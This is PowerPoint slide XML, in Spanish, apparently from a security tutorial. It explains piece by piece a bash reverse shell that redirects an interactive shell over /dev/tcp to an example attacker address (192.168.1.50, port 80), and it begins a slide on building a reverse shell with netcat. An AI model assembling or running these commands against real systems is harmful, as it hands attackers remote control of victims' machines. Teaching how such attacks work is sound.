              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/bin/bash: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ejecuta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>todo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> el commando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>máquina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>víctima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>c : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>indica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> al ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/bin/bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ejecutar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> el commando sin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>abrir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>una</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>consola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>interactiva</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exec:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reemplaza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>proceso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> actual con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>uno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nuevo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> –i:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Inicia una consola interactiva de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&amp;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/192.168.1.50/80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Redirige la entrada y salida estándar a la dirección indicada en el puerto 80 creando una conexión de socket </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Redirige</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> entrada y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>salida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>estandar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>atacante</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> al socket </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Lo que hace la máquina víctima es ejecutar un comando que de forma paralela crea una consola interactiva de su equipo y la envía a la dirección especificada del servidor a través de un socket, al mismo tiempo se le indica que toda entrada y salida estándar que haga el servidor se introduzca en la consola que la víctima nos envío a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>traves</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>del socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pP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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290329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444870" y="204057"/>
            <a:ext cx="9671050" cy="559342"/>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2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Crear una reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Shell solo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:endParaRPr sz="28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46872" y="852763"/>
            <a:ext cx="10160000" cy="5891824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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	</a:t>
            </a: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Primero creamos el servidor en nuestro equipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ej</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
